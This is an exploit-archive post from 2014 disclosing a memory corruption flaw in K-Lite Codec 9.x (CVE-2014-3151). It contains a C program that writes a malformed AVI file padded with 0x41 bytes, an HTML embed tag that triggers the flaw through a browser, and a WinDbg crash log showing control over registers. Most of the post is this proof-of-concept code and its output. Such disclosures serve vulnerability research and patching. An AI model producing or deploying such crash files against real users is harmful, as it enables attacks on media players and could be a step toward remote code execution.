Home / exploits K-Lite CODEC 9.x Memory Corruption
Posted on 05 May 2014
# Exploit Title: [K-lite codec Version 9.x Memory corruption vulnerability] # Date: [2014/05/3] # Author: [Aryan Bayaninejad] # Linkedin : https://www.linkedin.com/profile/view?id=276969082 # Vendor Homepage: [http://www.codecguide.com] # Software Link: [ http://www.oldapps.com/k-lite_codec_pack.php?old_klite_codec=12328] # Version: [version 9.x and prior] # Tested on: [Windows Xp Sp3 32bit and 64 bit , Windows 7 32bit and 64 bit] # CVE : [CVE-2014-3151] # Found by Piece Dumb Fuzzer details: K-lite codec version 9.x and prior to that are vulnerable to a memory corruption vulnerability which allows remote attackers to execute arbitrary code execution to control the remote system via a malformed AVI file format . Tested on "Windows Media player latest edition", Internet explorer, GOM Player & KM player, Windows XP, 7 x64 & x86 . -------------------------------------------------------------------------------------------------------------------------------------------------- PoC to trigger memory corruption : #include<stdio.h> #include<stdlib.h> #include<windows.h> unsigned char sc[154] = { 0x52, 0x49, 0x46, 0x46, 0x44, 0x5E, 0x0A, 0x00, 0x41, 0x56, 0x49, 0x20, 0x4C, 0x49, 0x53, 0x54, 0x7C, 0xFC, 0x00, 0x00, 0x49, 0x4E, 0x46, 0x4F, 0x2D, 0x2D, 0x2D, 0x3E, 0xFC, 0xFF, 0xFF, 0xFF, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, } ; int main(int argc, char *argv[]) { HANDLE fileHandle = INVALID_HANDLE_VALUE; DWORD dwBytesWritten = 0; fileHandle = CreateFile("d:\poc.AVI",GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); if(fileHandle == INVALID_HANDLE_VALUE) { printf("(-)Failed to Create File"); exit(0); }else{ printf("(+) Writing File ..."); WriteFile(fileHandle,sc,154,&dwBytesWritten,NULL); } CloseHandle(fileHandle); return 0; } -------------------------------------------------------------------------------------------------------------------------------------------------- PoC to Remote trigger memory corruption : <embed type="application/x-mplayer2" pluginspage=" http://www.microsoft.com/Windows/MediaPlayer/" name="mediaplayer1" ShowStatusBar="true" EnableContextMenu="false" autostart="false" height="330" width="360" loop="false" src="D:/PoC.avi" /> windbg result: Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86 Copyright (c) Microsoft Corporation. All rights reserved. *** wait with pending attach Symbol search path is: c: etw0rmsymbols Executable search path is: ModLoad: 01000000 01013000 C:Program FilesWindows Media Playerwmplayer.exe ModLoad: 7c900000 7c9b2000 C:WINDOWSsystem32 tdll.dll ModLoad: 7c800000 7c8f6000 C:WINDOWSsystem32kernel32.dll ModLoad: 77dd0000 77e6b000 C:WINDOWSsystem32ADVAPI32.dll ModLoad: 77e70000 77f02000 C:WINDOWSsystem32RPCRT4.dll ModLoad: 77fe0000 77ff1000 C:WINDOWSsystem32Secur32.dll ModLoad: 7e410000 7e4a1000 C:WINDOWSsystem32USER32.dll ModLoad: 77f10000 77f59000 C:WINDOWSsystem32GDI32.dll ModLoad: 76390000 763ad000 C:WINDOWSsystem32IMM32.DLL ModLoad: 629c0000 629c9000 C:WINDOWSsystem32LPK.DLL ModLoad: 74d90000 74dfb000 C:WINDOWSsystem32USP10.dll ModLoad: 5ad70000 5ada8000 C:WINDOWSsystem32uxtheme.dll ModLoad: 77c10000 77c68000 C:WINDOWSsystem32msvcrt.dll ModLoad: 12950000 133b5000 C:WINDOWSsystem32wmp.dll ModLoad: 774e0000 7761e000 C:WINDOWSsystem32ole32.dll ModLoad: 773d0000 774d3000 C:WINDOWSWinSxSx86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5705_x-ww_36cfed49COMCTL32.dll ModLoad: 77f60000 77fd6000 C:WINDOWSsystem32SHLWAPI.dll ModLoad: 77120000 771ab000 C:WINDOWSsystem32OLEAUT32.dll ModLoad: 77c00000 77c08000 C:WINDOWSsystem32VERSION.dll ModLoad: 75a70000 75a91000 C:WINDOWSsystem32MSVFW32.dll ModLoad: 76b40000 76b6d000 C:WINDOWSsystem32WINMM.dll ModLoad: 7c9c0000 7d1d7000 C:WINDOWSsystem32SHELL32.dll ModLoad: 59a60000 59b01000 C:WINDOWSsystem32dbghelp.dll ModLoad: 13740000 13f1b000 C:WINDOWSsystem32wmploc.dll ModLoad: 74720000 7476c000 C:WINDOWSsystem32MSCTF.dll ModLoad: 00ba0000 00e65000 C:WINDOWSsystem32xpsp2res.dll ModLoad: 755c0000 755ee000 C:WINDOWSsystem32msctfime.ime ModLoad: 4ec50000 4edf6000 C:WINDOWSWinSxSx86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.2600.5660_x-ww_e0385ec6gdiplus.dll ModLoad: 76fd0000 7704f000 C:WINDOWSsystem32CLBCATQ.DLL ModLoad: 77050000 77115000 C:WINDOWSsystem32COMRes.dll ModLoad: 63380000 63434000 C:WINDOWSsystem32jscript.dll ModLoad: 7e720000 7e7d0000 C:WINDOWSsystem32SXS.DLL ModLoad: 0d780000 0d7be000 C:Program FilesWindows Media Playermpvis.dll ModLoad: 63000000 630e6000 C:WINDOWSsystem32WININET.dll ModLoad: 01400000 01409000 C:WINDOWSsystem32Normaliz.dll ModLoad: 1a400000 1a532000 C:WINDOWSsystem32urlmon.dll ModLoad: 5dca0000 5de88000 C:WINDOWSsystem32iertutil.dll ModLoad: 15110000 1536c000 C:WINDOWSsystem32wmvcore.dll ModLoad: 11c70000 11caa000 C:WINDOWSsystem32WMASF.DLL ModLoad: 76380000 76385000 C:WINDOWSsystem32MSIMG32.dll ModLoad: 77920000 77a13000 C:WINDOWSsystem32SETUPAPI.dll ModLoad: 77690000 776b1000 C:WINDOWSsystem32NTMARTA.DLL ModLoad: 71bf0000 71c03000 C:WINDOWSsystem32SAMLIB.dll ModLoad: 76f60000 76f8c000 C:WINDOWSsystem32WLDAP32.dll ModLoad: 0bef0000 0bf27000 C:WINDOWSsystem32MFPlat.DLL ModLoad: 71ab0000 71ac7000 C:WINDOWSsystem32WS2_32.dll ModLoad: 71aa0000 71aa8000 C:WINDOWSsystem32WS2HELP.dll ModLoad: 76c30000 76c5e000 C:WINDOWSsystem32WINTRUST.dll ModLoad: 77a80000 77b15000 C:WINDOWSsystem32CRYPT32.dll ModLoad: 77b20000 77b32000 C:WINDOWSsystem32MSASN1.dll ModLoad: 76c90000 76cb8000 C:WINDOWSsystem32IMAGEHLP.dll ModLoad: 72d20000 72d29000 C:WINDOWSsystem32wdmaud.drv ModLoad: 72d10000 72d18000 C:WINDOWSsystem32msacm32.drv ModLoad: 77be0000 77bf5000 C:WINDOWSsystem32MSACM32.dll ModLoad: 77bd0000 77bd7000 C:WINDOWSsystem32midimap.dll ModLoad: 61da0000 61db0000 C:WINDOWSsystem32mcicda.dll ModLoad: 0e510000 0e562000 C:WINDOWSsystem32mswmdm.dll ModLoad: 769c0000 76a74000 C:WINDOWSsystem32USERENV.dll ModLoad: 5b860000 5b8b6000 C:WINDOWSsystem32 etapi32.dll ModLoad: 0dfb0000 0dfe9000 C:WINDOWSsystem32mspmsp.dll ModLoad: 07940000 0797b000 C:WINDOWSsystem32cewmdm.dll ModLoad: 11d10000 11d1d000 C:WINDOWSsystem32wmdmps.dll ModLoad: 62bf0000 62c22000 C:WINDOWSsystem32upnphost.dll ModLoad: 4d4f0000 4d549000 C:WINDOWSsystem32WINHTTP.dll ModLoad: 74f00000 74f0c000 C:WINDOWSsystem32SSDPAPI.dll ModLoad: 76d60000 76d79000 C:WINDOWSsystem32iphlpapi.dll ModLoad: 13fe0000 14014000 C:Program FilesWindows Media Playerwmpnssci.dll ModLoad: 109c0000 109ec000 C:WINDOWSsystem32PortableDeviceTypes.dll ModLoad: 10930000 10979000 C:WINDOWSsystem32PortableDeviceApi.dll ModLoad: 0e020000 0e089000 C:WINDOWSsystem32MSSCP.dll ModLoad: 75cf0000 75d81000 C:WINDOWSsystem32mlang.dll ModLoad: 08b70000 08c65000 C:WINDOWSsystem32drmv2clt.dll ModLoad: 76ee0000 76f1c000 C:WINDOWSsystem32RASAPI32.dll ModLoad: 76e90000 76ea2000 C:WINDOWSsystem32 asman.dll ModLoad: 76eb0000 76edf000 C:WINDOWSsystem32TAPI32.dll ModLoad: 76e80000 76e8e000 C:WINDOWSsystem32 tutils.dll ModLoad: 77c70000 77c94000 C:WINDOWSsystem32msv1_0.dll ModLoad: 722b0000 722b5000 C:WINDOWSsystem32sensapi.dll ModLoad: 14030000 14054000 C:WINDOWSsystem32wmpps.dll ModLoad: 71a50000 71a8f000 C:WINDOWSsystem32mswsock.dll ModLoad: 662b0000 66308000 C:WINDOWSsystem32hnetcfg.dll ModLoad: 71a90000 71a98000 C:WINDOWSSystem32wshtcpip.dll ModLoad: 76fc0000 76fc6000 C:WINDOWSsystem32 asadhlp.dll ModLoad: 76f20000 76f47000 C:WINDOWSsystem32DNSAPI.dll ModLoad: 10000000 10008000 C:Program FilesInternet Download Manageridmmkb.dll ModLoad: 77b40000 77b62000 C:WINDOWSsystem32appHelp.dll ModLoad: 5cb00000 5cb6e000 C:WINDOWSsystem32shimgvw.dll ModLoad: 38a70000 38a7c000 C:PROGRA~1COMMON~1MICROS~1OFFICE12MSOXMLMF.DLL ModLoad: 78130000 781cb000 C:WINDOWSWinSxSx86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_44262b86MSVCR80.dll ModLoad: 74810000 7497d000 C:WINDOWSsystem32quartz.dll ModLoad: 75f40000 75f51000 C:WINDOWSsystem32devenum.dll ModLoad: 02f30000 02f9e000 C:Program FilesK-Lite Codec PackFiltersLAVLAVSplitter.ax ModLoad: 6f640000 6f753000 C:Program FilesK-Lite Codec PackFiltersLAVavformat-lav-55.dll ModLoad: 69f00000 6aac0000 C:Program FilesK-Lite Codec PackFiltersLAVavcodec-lav-55.dll ModLoad: 6f540000 6f581000 C:Program FilesK-Lite Codec PackFiltersLAVavutil-lav-52.dll ModLoad: 02c00000 02c32000 C:Program FilesK-Lite Codec PackFiltersLAVlibbluray.dll ModLoad: 02fe0000 03176000 C:Program FilesK-Lite Codec PackFiltersvsfilter.dll ModLoad: 763b0000 763f9000 C:WINDOWSsystem32COMDLG32.dll ModLoad: 73000000 73026000 C:WINDOWSsystem32WINSPOOL.DRV ModLoad: 133d0000 1340f000 C:WINDOWSsystem32wmpasf.dll ModLoad: 71b20000 71b32000 C:WINDOWSsystem32MPR.dll ModLoad: 57fd0000 57ff7000 C:WINDOWSsystem32mpg2splt.ax ModLoad: 031d0000 03206000 C:Program FilesCommon FilesRoxio Shared9.0MPEGRoxioMPEGDemuxer.dll ModLoad: 03210000 0329b000 C:Program FilesK-Lite Codec PackFiltersHaalisplitter.ax ModLoad: 02fc0000 02fd7000 C:Program FilesK-Lite Codec PackFiltersHaalimkzlib.dll ModLoad: 032b0000 032bc000 C:Program FilesK-Lite Codec PackFiltersHaalimkunicode.dll ModLoad: 03330000 03350000 C:Program FilesK-Lite Codec PackFiltersHaaliavi.dll *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:WINDOWSsystem32 tdll.dll - (a20.f58): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:Program FilesK-Lite Codec PackFiltersHaaliavi.dll - eax=41414141 ebx=03360000 ecx=41414141 edx=03362248 esi=03362240 edi=00000044 eip=7c910ede esp=01d2f92c ebp=01d2fb4c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 ntdll!wcsncpy+0x905: 7c910ede 8b39 mov edi,dword ptr [ecx] ds:0023:41414141=????????
